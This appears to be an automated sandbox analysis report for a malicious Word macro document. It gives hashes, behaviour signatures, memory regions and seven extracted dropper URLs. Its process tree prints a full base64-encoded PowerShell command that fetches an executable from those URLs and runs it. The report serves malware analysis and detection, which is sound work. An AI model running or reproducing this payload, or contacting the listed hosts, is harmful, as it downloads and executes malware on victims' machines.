Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    15/05/2024, 19:38

General

  • Target

    47b5bcd993d01ef57bf1656b91011da4_JaffaCakes118.doc

  • Size

    170KB

  • MD5

    47b5bcd993d01ef57bf1656b91011da4

  • SHA1

    3cc166aa1812f2edb1c27a2a44a94b919045a012

  • SHA256

    1c3544c3d12411b68e3260fa40e9dc0826c344c9a131928a04c7f8f517166645

  • SHA512

    1a8216b994afbef58bbe535ce54ca2e3b0bb7aebcd4a9a5a5ff3a1c97d857591c58da3185f425606431c85bffde0583b152227f085cda925f717da458ab288c5

  • SSDEEP

    1536:AGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xiP340Vzy7dUWqHe43d9T96aEH5ig:yrfrzOH98ipgXPLQbq/v

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://geevida.com/wp-admin/DhWo/

exe.dropper

http://elrofanfoods.com/wp-admin/qc/

exe.dropper

https://volcanict.com/wp-admin/LfWFF/

exe.dropper

http://xmjadever.com/wp-admin/FTOXI/

exe.dropper

https://gbmcleaning.com/1/Gdk5eqv/

exe.dropper

https://kingchuen.com/cgi-bin/KQ/

exe.dropper

https://billc46.com/uf65/H4/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\47b5bcd993d01ef57bf1656b91011da4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABFAF8AOQBqAGEAcwBoAD0AKAAnAEcAJwArACcANwAnACsAKAAnADMAYwB6ADYAJwArACcAOAAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAcgBQAFIAbwBmAGkATABFAFwARgBzAFoANQBlADIAVwBcAFoAVgBGADcAaQB6AE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBJAGAAVABZAHAAYABSAG8AYABUAE8AQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACsAKAAnACwAIAAnACsAJwB0ACcAKQArACgAJwBsAHMAJwArACcAMQAxACcAKQArACgAJwAsACAAdABsACcAKwAnAHMAJwApACkAOwAkAE4AMwA3AHAAdQA3AGYAIAA9ACAAKAAnAFcAYQAnACsAKAAnAHEAJwArACcAaQBoAG8AJwApACsAJwBrADcAJwApADsAJABGADUAaABnADYANQA1AD0AKAAoACcAVQBpAHUAMAAnACsAJwA4ACcAKQArACcAZQAxACcAKQA7ACQAUQBmAGgANQAzAGwAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBGACcAKwAnAHMAJwArACgAJwB6ADUAZQAnACsAJwAyACcAKQArACcAdwB7ADAAfQBaACcAKwAnAHYAZgA3AGkAegBvAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABOADMANwBwAHUANwBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVgB2AGoAMAB0AGsAZgA9ACgAKAAnAE4AYQAnACsAJwBoAGoAZgAnACkAKwAnADcAMwAnACkAOwAkAFoAbwBvAHUAcABpAG0APQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAEUAMAA4AGwANgB2AGsAPQAoACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwAnACsAJwBnACcAKQArACcAZQBlACcAKwAoACcAdgAnACsAJwBpAGQAJwApACsAKAAnAGEALgBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8AJwApACsAKAAnAEQAaAAnACsAJwBXAG8AJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwBlACcAKQArACcAbAAnACsAKAAnAHIAbwAnACsAJwBmAGEAbgBmAG8AbwBkAHMAJwArACcALgAnACkAKwAoACcAYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQAnACkAKwAoACcAZAAnACsAJwBtACcAKwAnAGkAbgAvAHEAYwAnACkAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAcwA6AC8ALwAnACsAJwB2AG8AbABjACcAKQArACgAJwBhACcAKwAnAG4AaQAnACkAKwAoACcAYwB0ACcAKwAnAC4AYwBvACcAKQArACgAJwBtACcAKwAnAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AJwArACcATABmAFcARgAnACkAKwAoACcARgAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwB4ACcAKwAnAG0AagBhACcAKwAnAGQAZQB2AGUAcgAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAJwArACcAbgAvAEYAJwApACsAJwBUAE8AJwArACgAJwBYAEkAJwArACcALwAqAGgAdAB0AHAAJwApACsAJwBzACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZwBiAG0AYwAnACsAJwBsACcAKQArACgAJwBlACcAKwAnAGEAbgAnACkAKwAoACcAaQBuAGcAJwArACcALgBjAG8AJwArACcAbQAnACsAJwAvADEAJwArACcALwBHACcAKwAnAGQAawAnACsAJwA1AGUAcQB2AC8AKgBoACcAKQArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvACcAKwAnAC8AawAnACsAJwBpAG4AJwArACgAJwBnAGMAaAAnACsAJwB1ACcAKQArACcAZQBuACcAKwAoACcALgBjAG8AbQAvAGMAJwArACcAZwBpAC0AJwApACsAJwBiAGkAJwArACcAbgAvACcAKwAoACcASwAnACsAJwBRAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBiACcAKQArACcAaQAnACsAKAAnAGwAbABjADQANgAnACsAJwAuACcAKwAnAGMAbwBtAC8AJwArACcAdQBmADYAJwApACsAKAAnADUALwAnACsAJwBIADQAJwApACsAJwAvACcAKQAuACIAcwBQAEwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAHoAMwB6AGEAegBvAD0AKAAnAFkAeQAnACsAKAAnADcAdwAnACsAJwBtACcAKQArACcAeQA5ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AYQBmAHkAMQA4AGgAIABpAG4AIAAkAEUAMAA4AGwANgB2AGsAKQB7AHQAcgB5AHsAJABaAG8AbwB1AHAAaQBtAC4AIgBkAGAATwB3AE4AYABMAE8AYABBAGQARgBpAGwAZQAiACgAJABNAGEAZgB5ADEAOABoACwAIAAkAFEAZgBoADUAMwBsADEAKQA7ACQAUwA5AG4ANQBhADgAYQA9ACgAKAAnAFIAJwArACcAdAB4ADUAJwApACsAKAAnAHcAJwArACcAdQBpACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAFEAZgBoADUAMwBsADEAKQAuACIAbABgAEUAbgBHAFQAaAAiACAALQBnAGUAIAAzADgAMwA1ADQAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQAUQBmAGgANQAzAGwAMQApADsAJABXADgAaABtAGEAagBmAD0AKAAoACcARgBhADYAJwArACcAbwB0AGwAJwApACsAJwA3ACcAKQA7AGIAcgBlAGEAawA7ACQASAB1AGgAdAAwAHoAZgA9ACgAKAAnAFYAJwArACcAYQBzAGIAJwApACsAJwB1AHEAJwArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAZwByADIAMgB2AHoAPQAoACgAJwBGACcAKwAnAHgAJwArACcANAA4AGYAdAAnACkAKwAnAGcAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2500

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            dcb04e7a61ac8343f23132d062bc7974

            SHA1

            327d3f5424d7319e62e5695e32006001346ec033

            SHA256

            c5e978263fddd1b8744d1968a971c134feddade23a03811cb705b56d0e41ac32

            SHA512

            66124aebb61bbe0871d862a037add7285d1cfd82867610a407dd8c0f30bbcc334852a28e22ddc233c15cd7fdb859ad3d3a85a6523f87b1a065ef7305bec5ae8a

          • memory/2316-33-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-52-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-7-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-21-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-22-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-32-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-31-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-0-0x000000002FAA1000-0x000000002FAA2000-memory.dmp

            Filesize

            4KB

          • memory/2316-2-0x0000000070D7D000-0x0000000070D88000-memory.dmp

            Filesize

            44KB

          • memory/2316-69-0x0000000070D7D000-0x0000000070D88000-memory.dmp

            Filesize

            44KB

          • memory/2316-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2316-50-0x0000000005B90000-0x0000000005C90000-memory.dmp

            Filesize

            1024KB

          • memory/2316-51-0x0000000005DA0000-0x0000000005EA0000-memory.dmp

            Filesize

            1024KB

          • memory/2316-48-0x0000000070D7D000-0x0000000070D88000-memory.dmp

            Filesize

            44KB

          • memory/2316-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2500-39-0x000000001B630000-0x000000001B912000-memory.dmp

            Filesize

            2.9MB

          • memory/2500-40-0x0000000002860000-0x0000000002868000-memory.dmp

            Filesize

            32KB